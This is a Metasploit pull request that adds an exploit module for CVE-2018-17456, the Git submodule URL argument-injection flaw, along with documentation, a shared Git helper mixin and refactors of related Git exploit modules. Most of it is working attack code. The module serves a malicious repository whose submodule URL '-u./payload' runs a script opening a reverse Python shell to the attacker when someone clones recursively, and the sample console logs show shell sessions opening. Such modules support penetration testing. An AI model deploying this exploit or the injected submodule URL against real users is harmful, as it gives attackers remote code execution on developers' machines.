### PR TITLE
 git submodule url exec (CVE-2018-17456)

### DIFF
--- a/documentation/modules/exploit/multi/http/git_submodule_url_exec.md
+++ b/documentation/modules/exploit/multi/http/git_submodule_url_exec.md
@@ -1,0 +1,87 @@
+## Description
+
+  This module exploits CVE-2018-17456, which affects Git versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.  
+
+  When a submodule url which starts with a dash e.g "-u./payload" is passed as an argument to git clone, the file "payload" inside the repository is executed.
+
+  This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised (e.g git clone --recurse-submodules URL)
+
+## Vulnerable Application
+
+  Git can be installed on a variety of operating systems, however
+  newer versions will contain the patch for this vulnerability.
+
+  On OSX it can be installed with the XCode command line tools:
+  `xcode-select --install`
+  
+  On Linux it can be installed with apt:
+  `sudo apt-get update && sudo apt-get install git`
+
+  You can check the version with `git --version`.
+  The fix is included in the following version:
+    2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the application
+  1. Start msfconsole
+  1. Do: `use exploit/multi/http/git_submodule_url_exec`
+  1. Do: `set LHOST [local host]`
+  1. Do: `exploit`
+  1. Clone the malicious Git URI and its submodules (e.g `git clone --recurse-submodules GIT_URL`)
+  1. You should get a shell
+
+## Options
+
+  **GIT_URI**
+
+  This is the URI the git repository will be hosted from (defaults to random).
+
+  **GIT_SUBMODULE**
+
+  This is the URI of the submodule within the git repository (defaults to random).
+  The url of this submodule, when cloned, will execute the payload.
+
+## Scenarios
+
+
+```
+msf5 > use exploit/multi/http/git_submodule_url_exec
+msf5 exploit(multi/http/git_submodule_url_exec) > set LHOST 192.168.0.1
+LHOST => 192.168.0.1
+msf5 exploit(multi/http/git_submodule_url_exec) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.0.1:4444
+msf5 exploit(multi/http/git_submodule_url_exec) > [*] Using URL: http://0.0.0.0:8080/yaDlXuHVnRMMYGQ
+[*] Local IP: http://192.168.0.1:8080/yaDlXuHVnRMMYGQ
+[*] Server started.
+[*] Malicious Git URI is http://192.168.0.1:8080/ogkvs.git
+[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:41034) at 2018-10-18 12:41:40 +0000
+[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:41036) at 2018-10-18 12:41:41 +0000
+```
+
+On the victim side:
+
+```
+git clone --recurse-submodules http://192.168.0.1:8080/ogkvs.git
+Cloning into 'ogkvs'...
+Submodule 'lfr:lr' (-u./rDwoZ) registered for path 'lfr:lr'
+Cloning into 'lr'...
+fatal: Could not read from remote repository.
+
+Please make sure you have the correct access rights
+and the repository exists.
+fatal: clone of '-u./rDwoZ' into submodule path 'ogkvs/lfr:lr' failed
+Failed to clone 'lfr:lr'. Retry scheduled
+Cloning into 'lr'...
+fatal: Could not read from remote repository.
+
+Please make sure you have the correct access rights
+and the repository exists.
+fatal: clone of '-u./rDwoZ' into submodule path 'ogkvs/lfr:lr' failed
+Failed to clone 'lfr:lr' a second time, aborting
+```

--- a/lib/msf/core/exploit/git.rb
+++ b/lib/msf/core/exploit/git.rb
@@ -2,12 +2,7 @@
 
 module Msf
 
-###
-#
-# This mixins will provides helper functions for building GIT repositories
-#
-###
-
+# This mixin provides helper functions for building Git repositories
 module Exploit::Git
 
   # Generate a commit message using fake names and emails
@@ -41,4 +36,3 @@ module Exploit::Git
 
 end
 end
-

--- a/lib/msf/core/exploit/git.rb
+++ b/lib/msf/core/exploit/git.rb
@@ -1,0 +1,44 @@
+# -*- coding: binary -*-
+
+module Msf
+
+###
+#
+# This mixins will provides helper functions for building GIT repositories
+#
+###
+
+module Exploit::Git
+
+  # Generate a commit message using fake names and emails
+  def fake_commit_message
+    email = Rex::Text.rand_mail_address
+    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
+    full_name = "#{first.capitalize} #{last.capitalize}"
+    tstamp = Time.now.to_i
+    author_time = rand(tstamp)
+    commit_time = rand(author_time)
+    tz_off = rand(10)
+    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
+             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
+             "\n" \
+             "Initial commit to open git repository for #{company}!\n"
+    commit
+  end
+
+  # Build's a Git object
+  def build_object(type, content)
+    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
+    header = "#{type} #{content.size}\0"
+    store = header + content
+    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
+  end
+
+  # Returns the Git object path name that a file with the provided SHA1 will reside in
+  def get_path(sha1)
+    sha1[0...2] + '/' + sha1[2..40]
+  end
+
+end
+end
+

--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -67,6 +67,7 @@ require 'msf/core/exploit/afp'
 require 'msf/core/exploit/realport'
 require 'msf/core/exploit/sip'
 require 'msf/core/exploit/tincd'
+require 'msf/core/exploit/git'
 
 # Telephony
 require 'msf/core/exploit/dialup'

--- a/modules/exploits/multi/http/git_client_command_exec.rb
+++ b/modules/exploits/multi/http/git_client_command_exec.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Git
   include Msf::Exploit::Powershell
 
   def initialize(info = {})
@@ -181,23 +182,12 @@ class MetasploitModule < Msf::Exploit::Remote
     git_dir = '.' + variants.sample
     sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
-    # build the supposed commit that dropped this file, which has a random user/company
-    email = Rex::Text.rand_mail_address
-    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
-    full_name = "#{first.capitalize} #{last.capitalize}"
-    tstamp = Time.now.to_i
-    author_time = rand(tstamp)
-    commit_time = rand(author_time)
-    tz_off = rand(10)
-    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
-             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
-             "\n" \
-             "Initial commit to open git repository for #{company}!\n"
+
     if datastore['VERBOSE']
       vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:")
       commit.each_line { |l| vprint_status(l.strip) }
     end
-    sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
+    sha1, content = build_object('commit', "tree #{sha1}\n#{fake_commit_message}")
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
     # build HEAD
     @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
@@ -227,19 +217,6 @@ class MetasploitModule < Msf::Exploit::Remote
     @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
 
     # TODO: finish building the fake repository
-  end
-
-  # Build's a Git object
-  def build_object(type, content)
-    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
-    header = "#{type} #{content.size}\0"
-    store = header + content
-    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
-  end
-
-  # Returns the Git object path name that a file with the provided SHA1 will reside in
-  def get_path(sha1)
-    sha1[0...2] + '/' + sha1[2..40]
   end
 
   def exploit

--- a/modules/exploits/multi/http/git_submodule_command_exec.rb
+++ b/modules/exploits/multi/http/git_submodule_command_exec.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Git
 
   def initialize(info = {})
     super(
@@ -97,36 +98,10 @@ url = ssh://-oProxyCommand=#{payload_cmd}/
     sha1, content = build_object('tree', tree)
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
 
-    ## build the supposed commit that dropped this file, which has a random user/company
-    email = Rex::Text.rand_mail_address
-    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
-    full_name = "#{first.capitalize} #{last.capitalize}"
-    tstamp = Time.now.to_i
-    author_time = rand(tstamp)
-    commit_time = rand(author_time)
-    tz_off = rand(10)
-    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
-             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
-             "\n" \
-             "Initial commit to open git repository for #{company}!\n"
-
-    sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
+    sha1, content = build_object('commit', "tree #{sha1}\n#{fake_commit_message}")
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
     @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
     @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
-  end
-
-  # Build's a Git object
-  def build_object(type, content)
-    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
-    header = "#{type} #{content.size}\0"
-    store = header + content
-    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
-  end
-
-  # Returns the Git object path name that a file with the provided SHA1 will reside in
-  def get_path(sha1)
-    sha1[0...2] + '/' + sha1[2..40]
   end
 
   def exploit

--- a/modules/exploits/multi/http/git_submodule_url_exec.rb
+++ b/modules/exploits/multi/http/git_submodule_url_exec.rb
@@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
                   This module exploits CVE-2018-17456, which affects Git
           versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.
 
-          A submodule url which starts with a dash e.g "-u./payload" is passed
-          as an argument to git clone, and the file "payload" inside the repository
+          When a submodule url which starts with a dash e.g "-u./payload" is passed
+          as an argument to git clone, the file "payload" inside the repository
           is executed.
 
           This module creates a fake git repository which contains a submodule
@@ -115,33 +115,14 @@ url = -u./#{payload_file}
     @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
   end
 
-  def exploit
-    super
-  end
-
   def primer
     # add the git and mercurial URIs as necessary
     hardcoded_uripath(git_uri)
     print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}")
   end
 
-  # handles routing any request to the mock git, mercurial or simple HTML as necessary
+  # handles git clone
   def on_request_uri(cli, req)
-    # if the URI is one of our repositories and the user-agent is that of git/mercurial
-    # send back the appropriate data, otherwise just show the HTML version
-    user_agent = req.headers['User-Agent']
-    if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri)
-      do_git(cli, req)
-      return
-    end
-
-    do_html(cli, req)
-  end
-
-  # simulates a Git HTTP server
-  def do_git(cli, req)
-    # determine if the requested file is something we know how to serve from our
-    # fake repository and send it if so
     req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
     if @repo_data[:git][:files].key?(req_file)
       vprint_status("Sending Git #{req_file}")
@@ -150,28 +131,6 @@ url = -u./#{payload_file}
       vprint_status("Git #{req_file} doesn't exist")
       send_not_found(cli)
     end
-  end
-
-  # simulates an HTTP server with simple HTML content that lists the fake
-  # repositories available for cloning
-  def do_html(cli, _req)
-    resp = create_response
-    resp.body = <<HTML
-     <html>
-      <head><title>Public Repositories</title></head>
-      <body>
-        <p>Here are our public repositories:</p>
-        <ul>
-HTML
-    this_git_uri = URI.parse(get_uri).merge(git_uri)
-    resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
-    resp.body << <<HTML
-        </ul>
-      </body>
-    </html>
-HTML
-
-    cli.send_response(resp)
   end
 
   # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI

--- a/modules/exploits/multi/http/git_submodule_url_exec.rb
+++ b/modules/exploits/multi/http/git_submodule_url_exec.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Git
 
   def initialize(info = {})
     super(
@@ -108,36 +109,10 @@ url = -u./#{payload_file}
     sha1, content = build_object('tree', tree)
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
 
-    ## build the supposed commit that dropped these file, which has a random user/company
-    email = Rex::Text.rand_mail_address
-    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
-    full_name = "#{first.capitalize} #{last.capitalize}"
-    tstamp = Time.now.to_i
-    author_time = rand(tstamp)
-    commit_time = rand(author_time)
-    tz_off = rand(10)
-    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
-             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
-             "\n" \
-             "Initial commit to open git repository for #{company}!\n"
-
-    sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
+    sha1, content = build_object('commit', "tree #{sha1}\n#{fake_commit_message}")
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
     @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
     @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
-  end
-
-  # Build's a Git object
-  def build_object(type, content)
-    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
-    header = "#{type} #{content.size}\0"
-    store = header + content
-    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
-  end
-
-  # Returns the Git object path name that a file with the provided SHA1 will reside in
-  def get_path(sha1)
-    sha1[0...2] + '/' + sha1[2..40]
   end
 
   def exploit

--- a/modules/exploits/multi/http/git_submodule_url_exec.rb
+++ b/modules/exploits/multi/http/git_submodule_url_exec.rb
@@ -1,0 +1,211 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Malicious Git HTTP Server For CVE-2018-17456',
+        'Description' => %q(
+                  This module exploits CVE-2018-17456, which affects Git
+          versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.
+
+          A submodule url which starts with a dash e.g "-u./payload" is passed
+          as an argument to git clone, and the file "payload" inside the repository
+          is executed.
+
+          This module creates a fake git repository which contains a submodule
+          containing the vulnerability. The vulnerability is triggered when the
+          submodules are initialised (e.g git clone --recurse-submodules URL)
+        ),
+        'License' => MSF_LICENSE,
+        'References'     =>
+          [
+            ['CVE', '2018-17456'],
+            ['URL', 'https://marc.info/?l=git&m=153875888916397&w=2' ],
+            ['URL', 'https://gist.github.com/joernchen/38dd6400199a542bc9660ea563dcf2b6' ],
+            ['URL', 'https://blog.github.com/2018-10-05-git-submodule-vulnerability' ],
+          ],
+        'DisclosureDate' => 'Oct 05 2018',
+        'Targets' =>
+          [
+            [
+              'Automatic',
+              {
+                'Platform' => [ 'unix' ],
+                'Arch' => ARCH_CMD,
+                'Payload' =>
+                  {
+                    'Compat' =>
+                      {
+                        'PayloadType' => 'python'
+                      }
+                  }
+              }
+            ]
+          ],
+        'DefaultOptions' =>
+          {
+            'Payload' => 'cmd/unix/reverse_python'
+          },
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
+        OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', ''])
+      ]
+    )
+  end
+
+  def setup
+    @repo_data = {
+      git: { files: {} }
+    }
+    setup_git
+    super
+  end
+
+  def setup_git
+    # URI must start with a /
+    unless git_uri && git_uri =~ /^\//
+      fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
+    end
+
+    payload_content = "#!/bin/sh\n" + payload.raw + " &"
+    payload_file = Rex::Text.rand_text_alpha(rand(4) + 2)
+
+    submodule_path = datastore['GIT_SUBMODULE']
+    if submodule_path.blank?
+      submodule_path = Rex::Text.rand_text_alpha(rand(4) + 2).downcase + ":" + Rex::Text.rand_text_alpha(rand(4) + 2).downcase
+    end
+    unless submodule_path.include?":"
+      fail_with(Failure::BadConfig, 'GIT_SUBMODULE must contain a :')
+    end
+
+    gitmodules = "[submodule \"#{submodule_path}\"]
+path = #{submodule_path}
+url = -u./#{payload_file}
+"
+
+    sha1, content = build_object('blob', gitmodules)
+    @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
+    payloadsha1, content = build_object('blob', payload_content)
+    @repo_data[:git][:files]["/objects/#{get_path(payloadsha1)}"] = content
+
+    tree = "100644 .gitmodules\0#{[sha1].pack('H*')}"
+    tree += "100744 #{payload_file}\0#{[payloadsha1].pack('H*')}"
+    tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}"
+    sha1, content = build_object('tree', tree)
+    @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
+
+    ## build the supposed commit that dropped these file, which has a random user/company
+    email = Rex::Text.rand_mail_address
+    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
+    full_name = "#{first.capitalize} #{last.capitalize}"
+    tstamp = Time.now.to_i
+    author_time = rand(tstamp)
+    commit_time = rand(author_time)
+    tz_off = rand(10)
+    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
+             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
+             "\n" \
+             "Initial commit to open git repository for #{company}!\n"
+
+    sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
+    @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
+    @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
+    @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
+  end
+
+  # Build's a Git object
+  def build_object(type, content)
+    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
+    header = "#{type} #{content.size}\0"
+    store = header + content
+    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
+  end
+
+  # Returns the Git object path name that a file with the provided SHA1 will reside in
+  def get_path(sha1)
+    sha1[0...2] + '/' + sha1[2..40]
+  end
+
+  def exploit
+    super
+  end
+
+  def primer
+    # add the git and mercurial URIs as necessary
+    hardcoded_uripath(git_uri)
+    print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}")
+  end
+
+  # handles routing any request to the mock git, mercurial or simple HTML as necessary
+  def on_request_uri(cli, req)
+    # if the URI is one of our repositories and the user-agent is that of git/mercurial
+    # send back the appropriate data, otherwise just show the HTML version
+    user_agent = req.headers['User-Agent']
+    if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri)
+      do_git(cli, req)
+      return
+    end
+
+    do_html(cli, req)
+  end
+
+  # simulates a Git HTTP server
+  def do_git(cli, req)
+    # determine if the requested file is something we know how to serve from our
+    # fake repository and send it if so
+    req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
+    if @repo_data[:git][:files].key?(req_file)
+      vprint_status("Sending Git #{req_file}")
+      send_response(cli, @repo_data[:git][:files][req_file])
+    else
+      vprint_status("Git #{req_file} doesn't exist")
+      send_not_found(cli)
+    end
+  end
+
+  # simulates an HTTP server with simple HTML content that lists the fake
+  # repositories available for cloning
+  def do_html(cli, _req)
+    resp = create_response
+    resp.body = <<HTML
+     <html>
+      <head><title>Public Repositories</title></head>
+      <body>
+        <p>Here are our public repositories:</p>
+        <ul>
+HTML
+    this_git_uri = URI.parse(get_uri).merge(git_uri)
+    resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
+    resp.body << <<HTML
+        </ul>
+      </body>
+    </html>
+HTML
+
+    cli.send_response(resp)
+  end
+
+  # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
+  def git_uri
+    return @git_uri if @git_uri
+    if datastore['GIT_URI'].blank?
+      @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
+    else
+      @git_uri = datastore['GIT_URI']
+    end
+  end
+end

--- a/modules/exploits/multi/http/git_submodule_url_exec.rb
+++ b/modules/exploits/multi/http/git_submodule_url_exec.rb
@@ -35,27 +35,16 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://blog.github.com/2018-10-05-git-submodule-vulnerability' ],
           ],
         'DisclosureDate' => 'Oct 05 2018',
-        'Targets' =>
-          [
-            [
-              'Automatic',
-              {
-                'Platform' => [ 'unix' ],
-                'Arch' => ARCH_CMD,
-                'Payload' =>
-                  {
-                    'Compat' =>
-                      {
-                        'PayloadType' => 'python'
-                      }
-                  }
-              }
-            ]
-          ],
-        'DefaultOptions' =>
-          {
-            'Payload' => 'cmd/unix/reverse_python'
-          },
+        'Targets' => [
+          ['Automatic',
+            {
+              'Platform' => [ 'unix' ],
+              'Arch' => ARCH_CMD,
+              'Payload' => {'Compat' => {'PayloadType' => 'python'}}
+            }
+          ]
+        ],
+        'DefaultOptions' => {'Payload' => 'cmd/unix/reverse_python'},
         'DefaultTarget'  => 0
       )
     )
@@ -118,7 +107,9 @@ url = -u./#{payload_file}
   def primer
     # add the git and mercurial URIs as necessary
     hardcoded_uripath(git_uri)
-    print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}")
+    git_url = URI.parse(get_uri).merge(git_uri)
+    print_status("Malicious Git URI is #{git_url}")
+    print_status("git clone --recurse-submodules #{git_url}")
   end
 
   # handles git clone

--- a/modules/exploits/multi/http/git_submodule_url_exec.rb
+++ b/modules/exploits/multi/http/git_submodule_url_exec.rb
@@ -78,16 +78,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def setup_git
     # URI must start with a /
-    unless git_uri && git_uri =~ /^\//
+    unless git_uri && git_uri.start_with?('/')
       fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
     end
 
-    payload_content = "#!/bin/sh\n" + payload.raw + " &"
-    payload_file = Rex::Text.rand_text_alpha(rand(4) + 2)
+    payload_content = "#!/bin/sh\n#{payload.raw} &"
+    payload_file = Rex::Text.rand_text_alpha(4..6)
 
     submodule_path = datastore['GIT_SUBMODULE']
     if submodule_path.blank?
-      submodule_path = Rex::Text.rand_text_alpha(rand(4) + 2).downcase + ":" + Rex::Text.rand_text_alpha(rand(4) + 2).downcase
+      submodule_path = Rex::Text.rand_text_alpha(2..6).downcase + ":" + Rex::Text.rand_text_alpha(2..6).downcase
     end
     unless submodule_path.include?":"
       fail_with(Failure::BadConfig, 'GIT_SUBMODULE must contain a :')
@@ -137,7 +137,7 @@ url = -u./#{payload_file}
   def git_uri
     return @git_uri if @git_uri
     if datastore['GIT_URI'].blank?
-      @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
+      @git_uri = '/' + Rex::Text.rand_text_alpha(4..6).downcase + '.git'
     else
       @git_uri = datastore['GIT_URI']
     end


### PR DESCRIPTION
This is a HTTP implementation of the recent git submodule command execution bug.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/git_submodule_url_exec`
- [x] `set LHOST <tab>`
- [x] `exploit`
- [x] Clone the repository, e.g: `git clone --recurse-submodules http://YOUR_IP/randomurl.git`
- [x] **Verify** you get a shell.

## Optional improvements (I probably won't have time for this)

- Have the payload clean up the parent repository (and remove the vulnerability), so that it successfully clones.
- Support clone via SSH
- Support non-cmd payloads
